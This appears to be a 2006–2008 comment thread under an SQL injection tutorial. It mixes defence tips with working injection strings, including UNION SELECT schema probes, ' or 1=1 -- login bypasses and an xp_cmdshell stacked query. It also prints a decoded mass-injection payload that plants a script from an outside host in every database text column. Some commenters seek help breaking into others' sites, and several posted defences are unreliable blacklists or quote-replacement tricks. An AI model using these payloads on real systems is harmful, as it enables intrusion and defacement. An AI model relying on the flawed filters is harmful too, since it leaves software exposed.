Super, thank you! |
Date: |
18 Oct. 2006 |
| From: |
eddie |
| very useful, it helped me a lot. Thank you. |
|
| Subject:
|
sql injection |
Date: |
19 Oct. 2006 |
| From: |
ChrisM |
why don't you just (vb6):
replace(user_param,"e;'"e;,"e;''"e;) when concatenating to dynamic sql string?
(replace single quote with two single quotes)
strsql = "e;select * from table where user='admin' and password='"e; & replace(user_param,"e;'"e;,"e;''"e;) & "e;'"e;
set rs = conn.execute(strsql)
|
|
| Subject:
|
oh my goodness |
Date: |
27 Oct. 2006 |
| From: |
milad hatam |
| i don't wanna be hacked(useful) |
|
| Subject:
|
The requested URL miscSQLinsertion.htm was not found on this server. |
Date: |
27 Oct. 2006 |
| From: |
NoNameNoNickNoemai.com |
Is http://www.sensepost.com/misc/SQLinsertion.htm still valid?
It's a link from 9.0 section. |
|
| Subject:
|
http:www.sensepost.commiscSQLinsertion.htm |
Date: |
27 Oct. 2006 |
| From: |
Could you post it, please |
| http://www.sensepost.com/misc/SQLinsertion.htm does not work! |
|
| Subject:
|
translate |
Date: |
9 Nov. 2006 |
| From: |
armon_ahotmail.com |
| could anyone translate this to bosnian or croatian |
|
| Subject:
|
Very Useful |
Date: |
17 Nov. 2006 |
| From: |
Jon |
| Thanks for this. |
|
| Subject:
|
good article |
Date: |
18 Nov. 2006 |
| From: |
dhinos |
| <b>good</b>article |
|
| Subject:
|
Excellent!!!! |
Date: |
22 Nov. 2006 |
| From: |
Rurouni , rakhslackware-es.com |
Excellent little tutorial..!!! thanks,
just in case, if you get an error in section while using:
NOT IN ('login_id')-- , etc. .. you could try
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME <> 'login_id'--
It worked perfectly for me (<> means 'different' ),
|
|
| Subject:
|
good but complicated... |
Date: |
29 Nov. 2006 |
| From: |
asharma1991yahoo.com |
this is quite good for a mature person to understand........
well i am only 14 and i am interested in learning this
if any ones ready 2 help ..please mail me
|
|
| Subject:
|
Excellent Games with Google |
Date: |
30 Nov. 2006 |
| From: |
Google Games |
| http://www.googlegames.tk |
|
| Subject:
|
Very good |
Date: |
1 Dec. 2006 |
| From: |
cesar49hotmail.com |
| the information is very good. However, i would like to see some example how to avoid sql injection |
|
| Subject:
|
Very Good! |
Date: |
4 Dec. 2006 |
| From: |
me |
Very good!
People ought to use the mysql_real_escape_string() function. |
|
| Subject:
|
addslashes |
Date: |
23 Dec. 2006 |
| From: |
me |
| it is getting late and I did not read the whole article but a good way to allow quite a few special characters is to add slashes before. Using php it goes $new=(addslashes($old));. This works well with mysql but I don't know about the rest. |
|
| Subject:
|
Good one.......Explained clearly. but a bit lenghthy....... |
Date: |
27 Dec. 2006 |
| From: |
Vijaykumar Reddy vijay82.kumargmail.com |
| Good One..... who can read those need full detailed info..
|
|
| Subject:
|
excellent but stored proc is hackable |
Date: |
2 Jan. 2007 |
| From: |
gary |
Try this on your Northwind database:
SP:
CREATE PROCEDURE test (@mycity nvarchar(15))
AS
SELECT EmployeeID, LastName, FirstName, HomePhone, City
FROM Employees
WHERE City = @mycity
Now in query manager type in:
exec test 'x'; exec master.dbo.xp_cmdshell 'dir *.exe';--'
and this will work. |
|
| Subject:
|
thanks |
Date: |
8 Jan. 2007 |
| From: |
me |
| very helpful information u provided.......thank u... |
|
| Subject:
|
ty |
Date: |
10 Jan. 2007 |
| From: |
digit |
| very useful information, I recommend to read it. ;) |
|
| Subject:
|
Sql Injection |
Date: |
16 Jan. 2007 |
| From: |
imsamyrgmail.com |
| Nice, information keep it up. |
|
| Subject:
|
cool topic |
Date: |
23 Jan. 2007 |
| From: |
Eby |
| GUd article |
|
| Subject:
|
the codes r not helping |
Date: |
1 Feb. 2007 |
| From: |
aj_ridiculusyahoo.com |
| the codes given here are not workable in any sites plz give us some more codes |
|
| Subject:
|
easiest way to prevent it |
Date: |
7 Feb. 2007 |
| From: |
Ole |
There is a simple solution to all this, dunno if anybody mentioned it already since i didn't read it all. Replace the variable you send into the sql querry like this: replace(variableName,"e;'"e;,"e;'"e;) and your home fee. The ' is now text based and wont interrupt the sqlquerry.
Oh .. and to all the ppl here trying to use this shit to hack .. don't, the only thing you do is ruin other ppls data. update a table and append the -- and you update every single row in that table since there is no reference to which row your updating anymore.
Don't bloody well try to hack! its not l33t or cool or anything. Anybody can follow a recipe. |
|
| Subject:
|
Response to purpoted exploit |
Date: |
9 Feb. 2007 |
| From: |
thatoneguy |
Now in query manager type in:
exec test 'x'; exec master.dbo.xp_cmdshell 'dir *.exe';--'
and this will work.
================
That works because the "e;;"e; key in Query Analyzer effectively sends two separate commands. To demonstrate the effect of attempting to attack that store procedure via a sql injection vector, it would look like this:
exec test 'x; exec master.dbo.xp_cmdshell 'dir *.exe'
Your initial syntax in QA is functionally identical to:
exec test 'x'
GO
exec master.dbo.xp_cmdshell 'dir *.exe'
GO
|
|
| Subject:
|
easiest way to prevent it |
Date: |
12 Feb. 2007 |
| From: |
Ole |
| oh fuck, the replace text was messed up by this form submission .. what i meant to write was replace the ' with the ascii equivalent of the sign... |
|
| Subject:
|
Good information for software testers also |
Date: |
13 Feb. 2007 |
| From: |
JCHT |
| The information in the article and in the comments is also useful for those of us charged with testing software so that we catch these things before the users do. |
|
| Subject:
|
prepared statements |
Date: |
17 Feb. 2007 |
| From: |
someguy |
| The easiest way around sql injection is using a prepared statement if your language supports it. it will just interpret whatever you put into it literally. |
|
| Subject:
|
Good article |
Date: |
3 Mar. 2007 |
| From: |
Solai |
| This article very useful for understanding the SQL injection concept.One more suggestion is,If you put any document or PDf,then very useful for download the file and use it,whenever we want.. |
|
| Subject:
|
i need help |
Date: |
10 Mar. 2007 |
| From: |
decoder |
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause.
/villaDisplay.asp, line 106
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error converting data type varchar to int.
/about/press_Details.asp, line 13
can somebody tell me why all this cos i use this
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
|
|
| Subject:
|
Yeap, not bad |
Date: |
12 Mar. 2007 |
| From: |
DarkDawn |
Hi developers,
Have a suggestion for you guys also. At the same time you are keeping an eye on the data passed to your Queries/SPs , change your error messages also in your app/server. Try to post the main message to a defined mail address for later checks and show something simple by error time. It is possible thru .net and is working for us, not sure about the other languages but must be a way.
By the way, it is always PERFECT to know what are the possible ways getting into your app AND DO NOT FORGET: crackers are mostly really smart; hire one for your security if it is really necessary. ;)
GL & Tanx |
|
| Subject:
|
Interesting.. |
Date: |
30 Mar. 2007 |
| From: |
Chia |
btw, If you RUN IIS 6.0, just disable access to root directory using "e;..\"e; and also, disable "e;Detailed Error Message"e; and replace it with "e;Sorry, and error has occured"e; this way, there is no way for the attempting hacker to get any info back. Also in your ASP code or ASP.NET either use stored procedures, or make addition check statements to look at your Request.QueryString("e;"e;) or Request.Form("e;"e;)... like.. do a instr(stringname,"e;;"e;) test and see if "e;;"e; is found, if so throw exception. because if you enter data into a vulnerable form this will happen:
Lets say you input "e;test' ; <any SQL Command>;"e; into the form, then for the following SQL Query
SQLString = "e;Select * From Table1 where Username='"e; & userName & "e;'"e;...
It would look like :
Select * From Table1 where Username='test'; <any SQL Command>;
Which would then execute whatever comes after.
And you should test for other similar things, such as comamnds to Delete records and so forth. :) |
|
| Subject:
|
hi... can you check whats this kind of error can this be exploited |
Date: |
2 May 2007 |
| From: |
markykoy |
Server Error in '/WDSearch' Application.
--------------------------------------------------------------------------------
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "e;web.config"e; configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "e;mode"e; attribute set to "e;Off"e;.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="e;Off"e;/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "e;defaultRedirect"e; attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="e;RemoteOnly"e; defaultRedirect="e;mycustompage.htm"e;/>
</system.web>
</configuration>
--
need some comments |
|
| Subject:
|
Morons |
Date: |
10 May 2007 |
| From: |
Basiclife |
My official position is that half the people here are morons... SQL injection is a valid method of attack to ANY database with a web app (unless the developer had been careful). Stored procedures are NOT safe - If you call sp_Login 'username', 'password' and someone replaces 'username' with ','';<QUERY>-- then it will still execute query. Also, to the people above who are only here because they are too incompetent to understand the principles of SQL Injection - Go home and try again.
In regards to PHP: php has a mysql_escape_string function which is very handy for preventing injection but whether or not the developer uses it is another question.
And in answer to the post above, that's an ASP.NET error page which is specifically designed to not show ANY error informationf or HTTP 500 errors, thus making your life REALLY hard.
The yellow boxes on the error with the web configs are explaining how the site owner can allow error messages to be shown (noone does). This one might be a real pain. good luck :) |
|
| Subject:
|
SQL injections in URLs |
Date: |
12 May 2007 |
| From: |
Mikki |
Good article.
Now address SQL injection attacks via the URL itself, wherein one appends SQL commands behind any numeric field in a URL. For instance, you could use ;select * from users.
|
|
| Subject:
|
Preventing SQL Injection |
Date: |
17 May 2007 |
| From: |
Vasu |
That is a good thing to do. Custom Errors mode = RemoteOnly prevents the error being shown to End User. That is definitely a good practice.
1) May be some times genuine errors that u may face when u r using from a client PC. Same u may not be able to simulate from Server or next time u do it. So it is always a good practice to use this
Try
Catch e as exception 'This can be put for every exception type
'Write to Original error Eventlog
'Put a Generic Message to the screen
'like 'There is Generic Error in the Operations, Contact ........ for getting your problem resolved'
End try
This is useful in .NET. You can put you equivalent code as per ur code language and Ensure all ur SQL Statement are covered with Error Handling. And No Error should be passed on to the screen from database.
2) Avoid using login 'sa' to access the data. Create a login on your own. Restrict its access only to your database avoiding master db access. |
|
| Subject:
|
Answers for this |
Date: |
24 May 2007 |
| From: |
tecnico_de_redeshotmail.com |
pagina de login
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in D:\Inetpub\default\login.php on line 23
Ainda n�o te safaste!!!! |
|
| Subject:
|
Comment |
Date: |
30 May 2007 |
| From: |
Amit |
Well ..While coding keep a guy who writes functions for input validation.
Validation is MUST ~!! |
|
| Subject:
|
how to attck if preparedstatment is used |
Date: |
7 Jun. 2007 |
| From: |
asmitadtechmahindra.com |
| Hi, I tried attacking a few sites in the way.....but they are all using 1) post request and probably using a preparedstatement object......in such a case how can we do SQL injection ....anyone please enlighten me.. |
|
| Subject:
|
How to prevent SQL injection |
Date: |
10 Jun. 2007 |
| From: |
Muhammad Irfan |
Hi!
I tried but :( Not how to prevent SQL injection Can anyone Tell me:( |
|
| Subject:
|
thnx |
Date: |
27 Jun. 2007 |
| From: |
alper celik |
thanks a lot for this brilliant article, and i suggest to use stored procedures to protect us against sql injections, and also do not give users to full access to d.b. management.
Good luck |
|
| Subject:
|
A very simple solution for this! |
Date: |
29 Jun. 2007 |
| From: |
Freaky |
place this in your config file:
$_SERVER['REQUEST_URI'] = mysql_real_escape_string($_SERVER['REQUEST_URI']);
if you don't like this way use this:
$sql_url = $_SERVER['REQUEST_URI'];
$sql_array = Array();
$sql_array[] = "e;mysql"e;;
$sql_array[] = "e;)"e;;
$sql_array[] = "e;;"e;;
$sql_array[] = "e;'"e;;
$sql_array[] = "e;}"e;;
$sql_array[] = "e;INSERT"e;;
$sql_array[] = "e;DROPTABLE"e;;
$sql_array[] = "e;TRUNCATE"e;;
$sql_array[] = "e;DROP"e;;
$sql_array[] = "e;UPDATE"e;;
$sql_array[] = "e;%"e;;
$sql_array[] = "e;UNION"e;;
$sql_array[] = "e;ALL"e;;
// $sql_array[] = "e;"e;; add things yourself
foreach($sql_array As $not_alowed) {
if(eregi($not_alowed,$sql_url)) {
echo 'SQL injection security!';
exit;
}
}
this will block all things named in de arrays!
All you have to do is put this in your config file that will be included into every page and all your problemes are solved! |
|
| Subject:
|
Stored procedures do not prevent injection |
Date: |
5 Jul. 2007 |
| From: |
Burhaan |
| Using stored procedures does not necessarily prevent SQL injection. One has to be careful and ensure that stronly names types are defined in code. I learnt this the hard way ! |
|
| Subject:
|
Help me sql injection |
Date: |
8 Jul. 2007 |
| From: |
shafiq |
i found an sql injection in a url! how can i access! its hard for me to hack am tired...
here is the info!
www.mywebsite.com/daily/kashmirnews/index.php?page='
how do i access?
|
|
| Subject:
|
Not Applicable anymore |
Date: |
18 Jul. 2007 |
| From: |
donpogi2yahoo.com |
| it is still useless even though you get to pass the login page. all session variables will be left empty and therefore, its like window shopping with no money. |
|
| Subject:
|
More advance SQL injection techniques |
Date: |
31 Jul. 2007 |
| From: |
Mr. India |
The techniques given above are very common and most of the people having a knowledge of SQL queries can easily understand and use such type of techniquies.
Also the current web based projects are already able to cope up with such kind of injection, we need to find even more advance method to get the information from the secured database. |
|
| Subject:
|
My Way |
Date: |
14 Aug. 2007 |
| From: |
MohamadSoftengYahoo.com |
for neglecting all of this type of SQL (injecting) you can fetch all rows from the database and then compare the input with each record in the database like this:
$con=mysql_query("e;SELECT * FROM login WHERE ID<>'Login';"e;);
while($get=mysql_fetch_row($con))
{
if($get[0]==$_REQUEST["e;ID"e;] && $get[1]==$_REQUEST["e;Password"e;])
{
print("e;Login accepted ..."e;);
}
} |
|
| Subject:
|
SQL Injection |
Date: |
15 Aug. 2007 |
| From: |
Geso |
The methods contributed above by various people seem to be surpassed by time. SQL Injection seems to be able to pass most database that also have web applications.
Just ask the guyz over at the UN, the secretary generals message page was hacked and changed using purely SQL Injection. |
|
| Subject:
|
lol |
Date: |
21 Aug. 2007 |
| From: |
VaRz |
try
$re=array("e;*"e;, "e;,"e;, "e;|"e;, "e;`"e;, "e;'"e;, "e;"e;"e;, "e;%"e;);
if ($_POST['textbox']){
str_replace($re,"e;"e;,$_POST['textbox']);
}
see if this works |
|
| Subject:
|
WHOILA |
Date: |
2 Oct. 2007 |
| From: |
Harddrive |
Hey, after reading this article I was so shocked to know how the internet world is so much exposed...!
SQL injections doesn't work for stored procedures...yeah..have tried to brake the barriers as part of testing my own built project..
Thanks anyways, it was a good tutorial !! |
|
| Subject:
|
Of course SP are suscpetible! |
Date: |
2 Nov. 2007 |
| From: |
Basiclife |
For a start, it depends HOW you call the SP - I worked at a company that did something like (ASP):
Set ObjRS = ObjCon.Execute("e;EXEC ap_login '"e; & ... Blah
The problem is, it just moves the SQL injection issue from the DB to the web server. SPs are _more_ secure if parameterised correctly.
Additionally, Dynamic SQL in the SP will completely invalidate any such precautions unless you manually type-check, etc... as an SP does.
good article though - very handy for easily explaining to others (saves me repeating myself ad infinitum)
Thanks |
|
| Subject:
|
Help me in SQL Ijection |
Date: |
22 Nov. 2007 |
| From: |
DaSatti danish_satti2002atyahoo.com |
I have a simple query and i am trying SQL Injection but do not succeed. Here is the query
$query="e;select * from users where `user_name` = '"e;.$user."e;' and `password` = '"e;.$pass."e;'"e;;
$res=mysql_query($query) or die("e;Error executing query"e;.mysql_error());
if(mysql_num_rows($res)>0)
{//other code
}
else
{echo "e;invalid username or password"e;; }
NO i am inserting following in the username field
' or 1=1 --
Still I am getting "e;Invalid username or password"e; What mistake an i making. I will be thankful if someone from you reply at my above provided email
Thanks |
|
| Subject:
|
help |
Date: |
5 Dec. 2007 |
| From: |
hax |
i am haviong trouble getting past the login with the strings. i type in admin for user name and i type in hi' or 1=1 for password. how do u pass it?
thanx |
|
| Subject:
|
What to do when magicquotegpc is on |
Date: |
12 Dec. 2007 |
| From: |
DaSatti Rawalpindi |
| Basic SQL Injection doesent work when whe magic_quote_gpc variable is on. By default it is on in PHP. How evber their are chances that it will not be on in later versions. The purpose of this is that it just embeds "e;\"e; behind the characters such as "e; ' "e;, "e; "e; "e;, "e; \ "e; and some of teh others. Can anybody tell what to do in this case |
|
| Subject:
|
Great artical! |
Date: |
31 Dec. 2007 |
| From: |
BkJk |
Hey. Very nice artical.
I would just like to point out that when you said that SYSTEM has the same privileges as the administrator that that is slightly off. SYSTEM actually has more privileges because SYSTEM can terminate any process owned by SYSTEM whereas even an administrator can't do this. Nothing big, just wanted to point that out. |
|
| Subject:
|
very good explanation |
Date: |
9 Jan. 2008 |
| From: |
sukumar |
very good information u have given.
recently i was shifted to security testing department, but i dont know how to do security testing . but my team lead said that u have to hack or crack this application atleast once before this will go to customer said.
what can i do, which is the best way to learn the hack?
pls save me guide me..
|
|
| Subject:
|
How to prevent SQL injection. |
Date: |
10 Feb. 2008 |
| From: |
Mike |
I have a very effective way of stopping SQL injection --- if you're using PHP 5.2.3 use this little function:
function filter(&$item) {
if (is_array($item)) foreach ($item as &$element) filter($element);
else $item = str_replace(str_split("e;=+()*\\/"e;), NULL, htmlentities($item, ENT_QUOTES, "e;ISO-8859-1"e;, TRUE));
}
Then simply call it on $_REQUEST:
filter($_REQUEST);
Job done :) |
|
| Subject:
|
sql injection tools to download |
Date: |
12 Feb. 2008 |
| From: |
sqlinject |
how to guard against the sql injection:
http://beta.firsttub.com/htdocs/cms/wordpress/2008/02/12/guard-against-the-sql-injection/ |
|
| Subject:
|
Is this safe part 1 of 2 |
Date: |
16 Feb. 2008 |
| From: |
blaghssd |
foreach($arrayname as $key => $value)
{
$value = str_replace("e;$"e;, "e;_DOLLAR_"e;, "e;$value"e;);
$value = str_replace("e;="e;, "e;_E_"e;, "e;$value"e;);
$value = str_replace("e;&"e;, "e;_AND_"e;, "e;$value"e;);
$value = str_replace("e;*"e;, "e;_STAR_"e;, "e;$value"e;);
$value = str_replace("e;?"e;, "e;_QUESTION_"e;, "e;$value"e;);
$value = str_replace("e;|"e;, "e;_PIPE_"e;, "e;$value"e;);
$value = str_replace("e;`"e;, "e;_TICK_"e;, "e;$value"e;);
$value = str_replace("e;#"e;, "e;_POUND_"e;, "e;$value"e;);
$value = str_replace("e;^"e;, "e;_CARROT_"e;, "e;$value"e;);
$value = str_replace("e;!"e;, "e;_EXCLAMATION_"e;, "e;$value"e;);
$value = str_replace("e;;"e;, "e;_SEMICOLON_"e;, "e;$value"e;);
$value = str_replace("e;~"e;, "e;_WAVE_"e;, "e;$value"e;);
$value = str_replace("e;."e;, "e;_PERIOD_"e;, "e;$value"e;);
$value = str_replace("e;\"e;"e;, "e;_QUOTE_"e;, "e;$value"e;);
$value = str_replace("e;'"e;, "e;_APOSTROPHE_"e;, "e;$value"e;);
$value = str_replace("e;\\"e;, "e;_BACKSLASH_"e;, "e;$value"e;);
$value = str_replace("e;@"e;, "e;_AT_"e;, "e;$value"e;);
$value = str_replace("e;<"e;, "e;_LEFT_ARROW_"e;, "e;$value"e;);
$value = str_replace("e;>"e;, "e;_RIGHT_ARROW_"e;, "e;$value"e;);
$value = str_replace("e;["e;, "e;_LEFT_BRACKET_"e;, "e;$value"e;);
$value = str_replace("e;]"e;, "e;_RIGHT_BRACKET_"e;, "e;$value"e;);
$value = str_replace("e;%"e;, "e;_PERCENT_"e;, "e;$value"e;);
$returnarray[$key] = $value;
} |
|
| Subject:
|
Is this safe part 2 of 2 |
Date: |
16 Feb. 2008 |
| From: |
blaghssd |
$value = str_replace("e;_DOLLAR_"e;, "e;$"e;, "e;$value"e;);
$value = str_replace("e;_E_"e;, "e;="e;, "e;$value"e;);
$value = str_replace("e;_AND_"e;, "e;&"e;, "e;$value"e;);
$value = str_replace("e;_STAR_"e;, "e;*"e;, "e;$value"e;);
$value = str_replace("e;_QUESTION_"e;, "e;?"e;, "e;$value"e;);
$value = str_replace("e;_PIPE_"e;, "e;|"e;, "e;$value"e;);
$value = str_replace("e;_TICK_"e;, "e;`"e;, "e;$value"e;);
$value = str_replace("e;_POUND_"e;, "e;#"e;, "e;$value"e;);
$value = str_replace("e;_CARROT_"e;, "e;^"e;, "e;$value"e;);
$value = str_replace("e;_EXCLAMATION_"e;, "e;!"e; , "e;$value"e;);
$value = str_replace("e;_SEMICOLON_"e;, "e;;"e;, "e;$value"e;);
$value = str_replace("e;_WAVE_"e;, "e;~"e;, "e;$value"e;);
$value = str_replace("e;_PERIOD_"e;, "e;."e;, "e;$value"e;);
$value = str_replace("e;_QUOTE_"e;, "e;\"e;"e;, "e;$value"e;);
$value = str_replace("e;_APOSTROPHE_"e;, "e;'"e;, "e;$value"e;);
$value = str_replace("e;_BACKSLASH_"e;, "e;\\"e;, "e;$value"e;);
$value = str_replace("e;_AT_"e;, "e;@"e;, "e;$value"e;);
$value = str_replace("e;_LEFT_ARROW_"e;, "e;<"e;, "e;$value"e;);
$value = str_replace("e;_RIGHT_ARROW_"e;, "e;>"e;, "e;$value"e;);
$value = str_replace("e;_LEFT_BRACKET_"e;, "e;["e;, "e;$value"e;);
$value = str_replace("e;_RIGHT_BRACKET_"e;, "e;]"e;, "e;$value"e;);
$value = str_replace("e;_PERCENT_"e;, "e;%"e;, "e;$value"e;); |
|
| Subject:
|
tyvm |
Date: |
18 Feb. 2008 |
| From: |
ninja |
as a hacker/developer this was very usefull thank you for the information
XD |
|
| Subject:
|
IIS Filter |
Date: |
22 Mar. 2008 |
| From: |
josie |
Hi All,
I work as System Engineer in a major ISP company and we are hosting a large number of legacy ASP applications which contain SQL Injection flaws. I always suggest clients to solve the problem by hardening the source code, but 9 out 10 times they don't have the resources. I have been using this tool when clients agree:
http://www.codeplex.com/IIS6SQLInjection
So far it seems to be working and I have not had problems except that I cannot install in Windows 64 bit. Have you heard about this tool? Is there a way to make it work in 64 bit? The source code is there but I am not good in C++.
Thanks,
P.S.: I am not using my real name to avoid problem with my clients. |
|
| Subject:
|
IIS Filter to SQL Injection |
Date: |
8 May 2008 |
| From: |
Better Safe than Sorry |
A few of our legacy ASP application were affected by this outbreak. It was an accident waiting to happen though. The blame is on the poorly written code, not in SQL or IIS. Since it is too expensive (and difficult) to fix all code, you have to live with it. I found an interesting and free (GNU with source code) application for IIS that proved very efficient. I am still being attacked, but the filter has blocked the effects of such attacks.
Installation and code can be found here:
http://www.codeplex.com/IIS6SQLInjection (binary only)
The only bad thing is that it is not compatible with Windows 64 bits. I had to move all ASP application to a lesser server :(
|
|
| Subject:
|
THANK YOU FOR TUTORIAL (SQL INJECTION) |
Date: |
13 May 2008 |
| From: |
Roland Stenmark |
Dear Sir,
Thank you for generously providing information about "e;SQL INJECTION ATTACK"e;.
It is so nice of you to share important information regarding web security.
My Name is Roland Stenmark and I am a PHP Programmer in San Francisco.
I have been writing PHP, ASP, Java script, MYSQL codes for 5 years.
Now me and my clients began to concern/worry about how safe internet security is.
There are hackers everywhere and we all web professional are looking for a way to
secure safety of our web databases.
I have beek searching googling to find protection against SQL injection attack.
There are hundreds of web articles out there. Your technical information is very useful.
Your tutorial help us a lot and we gained some knowledge.
Is there any more alternative ?
Using PHP PDO Object is also a good idea?
I am still searching. If you know some, please let me know.
Thanks
|
|
| Subject:
|
reply |
Date: |
23 May 2008 |
| From: |
ram |
this artical is very help full to solve my problem while removing the valunabilities
thanks |
|
| Subject:
|
Najeeb |
Date: |
28 May 2008 |
| From: |
najeebkecherygmail.com |
Hi Friend,
So great to see such wonderful and a simple method to explain such a wonderful topic. You have done a great job my friend. I have been so enjoyed and got an nice idea about SQL Injection. And it makes divert my thoughts and brings me alot of new things to take care when I start coding. You have to proud my fried. |
|
| Subject:
|
SQL Injection Programming Help |
Date: |
13 Jun. 2008 |
| From: |
Amir Segal |
If this helps at all, I posted a page with SQL Injection programming protection here:
http://www.cheergallery.com/SQLInjectionHelp.html
Amir Segal, Programmer |
|
| Subject:
|
What theyre really doing |
Date: |
18 Jun. 2008 |
| From: |
princeoforange |
FWIW, the techniques mentioned here don't quite describe the methods of employed by recent SQL Injection attacks I've seen. Look for something like this being appended to a legitimate command parameter:
'DECLARE @S VARCHAR(4000) SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564 152434841522832353529204445434C415245205461626C655F437572736F7220435 552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F 4D207379736F626A6563747320612C737973636F6C756D6E7320622057484552452 0612E69643D622E696420414E4420612E78747970653D27752720414E442028622E7 8747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D 323331204F5220622E78747970653D31363729204F50454E205461626C655F437572 736F72204645544348204E4558542046524F4D205461626C655F437572736F722049 4E544F2040542C4043205748494C4528404046455443485F5354415455533D302920 424547494E20455845432827555044415445205B272B40542B275D20534554205B2 72B40432B275D3D525452494D28434F4E5645525428564152434841522834303030 292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2 F7777772E6368696E61626E722E636F6D2F622E6A733E3C2F7363726970743E2727 2729204645544348204E4558542046524F4D205461626C655F437572736F7220494E 544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444 5414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
If you print @S, you get:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chinabnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor |
|
| Subject:
|
SQL Injection Req. further more definitions |
Date: |
25 Jun. 2008 |
| From: |
Sarvesh |
| Good Explanation, Need further more details for the same. Alternatives ? to avoid such an occurance on to the server. Removal of Extended Stored Procedure is not so easy as they are having multiple dependencies over them. |
|
| Subject:
|
the article |
Date: |
2 Jul. 2008 |
| From: |
me |
| good, expect for the broken english |
|
| Subject:
|
Help! |
Date: |
2 Jul. 2008 |
| From: |
Adrian |
Hi. I tried using this tutorial against a page of my own. Im not sure if it is vounrable, because whenever I inject the code into the username and password and the hidden field it just throws me to the index of the site without telling me if my login information was correct or incorrect. I also tried to use the UNION command line, but it throws me to the index and shows me nothing more than it normally would. Would be greatful if someone helped me.
Thanks.
-Adrian |
|
| Subject:
|
Excellent |
Date: |
17 Jul. 2008 |
| From: |
Phil |
First class article. Excellent structure. Erudite content.
Many thanks.
--
Phil |
|
| Subject:
|
Table Name |
Date: |
21 Jul. 2008 |
| From: |
Murad |
| How can I find out table name by SQL injection? |
|
| Subject:
|
Firewall |
Date: |
24 Jul. 2008 |
| From: |
mrogersnetgmail.com |
Thanks. Good article and a lot of helpful comments on good coding practices to avoid SQL injection.
Any thoughts on firewall solutions such as Barracuda?
|
|
| Subject:
|
Another tip |
Date: |
22 Aug. 2008 |
| From: |
Brian |
| Make sure the login you use from your web site does NOT have permission to system tables when it is not needed, especially sysobjects,syscolumns, system_objects, etc... public has access to them by default and that is what opens the door wide for most of these lowlifes if they do find a crack. |
|
| Subject:
|
hey i dont get it... |
Date: |
5 Sep. 2008 |
| From: |
help |
i want to login to a cetain website forum and i dont have/a user name and password(its restricted to certain people) the html code is like .....
<form method="e;post"e; name="e;childLogin"e; onSubmit="e;if (this.childEmail.value=='' || this.childPass.value=='') {alert('Please enter login and password!'); return false;}"e;>
its then says some other stuff so please can you tell me how to log in? |
|
| Subject:
|
Scans |
Date: |
9 Sep. 2008 |
| From: |
jimgeuinfdle.state.fl.us |
| Interestingly, if a web page has a Microsoft Search button on it, we discovered that the MS Search function develops an "e;index"e; in order to expedite the search. Often a scan will find the site vulnerable to SQL Injection, when it is actually the MS Index database that is vulnerable, but as far as I can tell, not exploitable. |
|
| Subject:
|
mohamed |
Date: |
10 Sep. 2008 |
| From: |
httpdepiak.catreloaded.net |
what is the best way to prevent it in php ?
when recieving id from url , i set it's type to integer .
i also use addslashes()
do you know aother good techniques ? |
|
| Subject:
|
Doubt |
Date: |
16 Sep. 2008 |
| From: |
rajapradhagmail.com |
| having the username and the pawwsord as the same 1=1-- or hi' likewise for aspx page will it helps? The article was quite nice since i got more info but can you please clear of my doubt stated too.. Thanks in advance. |
|
| Subject:
|
sqp injections atk |
Date: |
17 Sep. 2008 |
| From: |
johnny |
| i greatly appreciated the effort of this tut, by can i ask , sql injection can it be do in games n r the login n pass to bypass the sql query is all ' or 1=1-- ?n if i insert this thing , which username's acc wil i b logged in , pls explain dis pls |
|
| Subject:
|
bNiceb |
Date: |
19 Sep. 2008 |
| From: |
Jonnycake |
Well, that's a nice tutorial. I didn't like that it focused on mssql though.
@Mohamed: That's a good idea. I don't think there's anything else you need to do. For strings use mysql_real_escape_string() or even parse it with a function that you wrote.
@Brian: Am I a lowlife? Wow, I hack. So what. Why am I a lowlife?
- Jonnycake <http://jonnycake.kicks-ass.net/index.php> |
|
| Subject:
|
sql injections |
Date: |
25 Sep. 2008 |
| From: |
shine |
| well, it is good tutorial, i was trying with stuff given here with a login page. Whenever i inject '1 or1' in username field/ password field the error page is displayed . the application is asp.net, let me know any other way to do injection. |
|
| Subject:
|
SQL injections |
Date: |
15 Oct. 2008 |
| From: |
Kishore |
Very good article.
I discovered SQL injection in some of the pages of my application.
Thanks a lot.. |
|
| Subject:
|
Thank you! |
Date: |
23 Oct. 2008 |
| From: |
michel-vegan |
Hi,
I'm a kind of a noob when it comes to this kind of things
But after this I don't feel like a noob annymore :P
oh and it helped me with what i wanted
Verry good article.
Thanks |
|
| Subject:
|
SQL injections |
Date: |
24 Oct. 2008 |
| From: |
Joby |
Very good article.
I discovered SQL injection in some of the pages of my application.
